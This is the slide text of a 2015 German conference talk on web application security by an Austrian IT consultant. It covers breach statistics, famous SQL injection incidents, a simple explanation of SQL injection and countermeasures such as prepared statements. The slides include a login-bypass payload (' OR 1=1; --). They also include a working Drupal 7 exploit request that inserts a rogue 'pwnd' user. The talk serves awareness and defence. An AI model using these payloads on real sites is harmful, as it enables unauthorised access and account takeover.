Sicher sein, statt in Sicherheit wiegen Sicherheit bei Web-Anwendungen Vortrag bei Infotech 08.06.2015
2
Ist Sicherheit bei Web-Anwendungen ein Thema? 3
Zusammenfassung Verizon Data-Breach-Report 2014, 1/2 Web-Anwendungen bleiben der sprichwörtliche Punchbag aus dem Internet. Sie werden in zwei Arten ausgenutzt: 1.) Schwachstellen werden in der Anwendung ausgenutzt (in der Regel unzureichende Eingabeüberprüfung)
Zusammenfassung Verizon Data-Breach-Report 2014, 2/2 2.) Mit Hilfe von gestohlener Anmeldeinformationen werden Identitäten geklaut oder gekapert. Viele der Angriffe im untersuchten Datenbestand 2013 beziehen sich auf fertige off-the-shelf Content-Management-Systeme (zb Joomla!, Wordpress oder Drupal).
Welche Arten von Einbrüchen wurden erfasst? Verizon
Wie wird eingebrochen? Verizon
Was sind die Motive von Einbrechern? Verizon
Wer bricht ein? Verizon
Anzahl der erfassten Fälle Verizon
Warum bricht jemand in Webanwendungen ein? Verizon
Wie lange braucht es, bis der Einbruch entdeckt wird? Verizon
Auswahl der Unternehmen, die an der Statistik mitwirkten Verizon
Es ist nicht eine Frage OB, sondern WANN Sie angegriffen werden Bruce Schneier 15
Aus eigener Erfahrung Fotobuch-Dienstleister Bestellsystem für Firmenkunden 16
Top 10 Sicherheitslücken, OWASP
Einbrüche über SQLi (1) 1999 Hacker Rain Forest Puppy Angriff auf IIS-Webserver mit MS-SQL-DB
Einbrüche über SQLi (2) 10 Jahre später, gleiche Methode Millionen von Kreditkartendaten gestohlen
Einbrüche über SQLi (3) 2007/2008 Hackingopfer: TJX, CC-Abrechnungsfirma 100 Millionen von Kreditkartendaten gestohlen
Einbrüche über SQLi (4) 08.11.2008 9 Mio $ Schaden in 30 Minuten Einbruch in RBS WorldPay an einem Samstag 49 Städte weltweit 130 Bankomaten 100 Kreditkarten 180 Abhebungen pro Karte
Einbrüche über SQLi (5) 2011 Hackingopfer: Sony, Playstation-Netz Schaden: ca. 1 Mrd. $ unmittelbar und insgesamt 24 Mrd. $ Schaden
Einbrüche über SQLi (6) 2011 Hackingopfer: Oracle (DB-Guru, Hersteller von Datenbanken)
Selbsttest
Selbsttest Haben Sie Fähigkeiten als potentieller Hacker?
1+2*x=5
1+2*2=5
1+2*(2)=5
1 + 2 * ( 3-1 ) = 5
1+2* 0 = 1; 5 =5
Was ist SQL-Injection? (SQLi) SQL = Standard Query Language Angriffsart auf Webanwendungen Befehle für die Datenbank werden eingeschleust Datenmanipulation im großen Stil
Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password'
Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password'
Abfragebefehl der Datenbank = Formel SELECT * FROM user WHERE name='$name' AND password='$password' Pseudocode: Wenn (SQL-Abfrage_liefert_name) dann login mit $name sonst Fehlerausgabe: Benutzername oder Passwort falsch Ende
itexperst geheim ;-) SELECT * FROM user WHERE name='itexperst' AND password='geheim'
itexperst ' OR 1=1; -- SELECT * FROM user WHERE name='itexperst' AND password='' OR 1=1; --'
Live-Hacking :-) No.1 38
Live-Hacking, No.2 Drupal 7 (Sicherheitslücke < v. 7.32) 38.757 http 19.035 https davon 29.474 USA 39
name=user01 &pass=pass01 &form_build_id=form-9ycitb32v-aq7b2liv42 K1xrM_KOHLdf LuAJppPOo2I &form_id=user_login_block &op=log+in
name[0;insert%20into%20users%20values %20(99999,'pwnd','$S$DIkdNZqdxqh7Tmufxs8l1v Au0wdzxF//smWKAcjCv45KWjK0YFBg','pwnd@p wnd.pwn','','',null,0,0,0,1,null,'',0,'',null);# %20%20]=test &name[0]=test &pass=test &form_id=user_login_block &op=log+in
name[0;insert%20into%20users%20values %20(99999,'pwnd','$S$DIkdNZqdxqh7Tmufxs8l1v Au0wdzxF//smWKAcjCv45KWjK0YFBg','pwnd@p wnd.pwn','','',null,0,0,0,1,null,'',0,'',null);# %20%20]=test &name[0]=test &pass=test &form_id=user_login_block &op=log+in
Jedes 3. Unternehmen in Ö Quelle: ORF, Ö1 Mittagsjournal vom 24.05.2013 43
In Deutschland ist so gut wie jeder Betrieb Opfer von Cyberattacken - vom Mittelständler bis zum Großkonzern. Das zu verschweigen, hilft nicht mehr weiter. Thomas Tschersich, Sicherheitschef der Deutschen Telekom in ORF III, Themenmontag, Im Visier der Hacker, 23.02.2015 44
47
Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit 48
Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests 49
Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil 50
Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil Prepared Statements 51
Abhilfe gegen SQLi Allg. Sicherheit, 5 Schritte zur IT-Sicherheit IT-Penetrationstests Filterung der Eingabe All input is evil Prepared Statements OWASP Top 10 + Developement Guide 52
office@itexperst.at Subject: Infotech-Geschenk Risiko Hackerangriff: So minimieren Sie die Haftung des Geschäftsführers 53
Wir helfen Ihnen, Ihre Unternehmensdaten abzusichern schnell und sofort
Dipl. Ing. Christian Perst Rupert-Gugg-Str. 53 A 5280 Braunau Gerichtlich beeideter Sachverständiger fon +43 / 77 22 / 98 200 mobile +43 / 699 / 18 19 94 63 Christian.Perst@itEXPERsT.com